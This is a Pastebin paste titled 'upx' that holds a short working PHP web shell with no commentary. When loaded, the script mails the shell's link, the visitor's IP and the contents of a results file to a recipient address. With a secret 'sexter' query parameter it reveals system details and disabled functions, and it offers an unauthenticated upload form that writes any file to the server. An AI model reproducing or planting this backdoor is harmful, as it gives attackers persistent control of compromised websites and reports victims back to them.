dragondevile

upx

Jan 18th, 2017
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4. $ss = $_SERVER['REMOTE_ADDR'];
  5. $subject = 'Result Full FROM | '.$ss.'';
  6. $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?sexter"."\r\n
  7. \n"."_________________________________". file_get_contents("resulte.txt") . "\n";
  8. $headers  = 'MIME-Version: 1.0' . "\r\n";
  9. $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  10. $headers .= 'From: Dexter <localhost>' . "\r\n";
  11. mail($to, $subject, $message, $headers);
  12.  
  13. if(isset($_GET["sexter"]))
  14.     {
  15.         echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
  16.         print "\n";$disable_functions = @ini_get("disable_functions");
  17.         echo "DisablePHP=".$disable_functions; print "\n";
  18.         echo"<form method=post enctype=multipart/form-data>";
  19.         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
  20.           if($_POST["v"]==up)
  21. { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
  22.  
  23.  
  24. ?>
Add Comment
Please, Sign In to add comment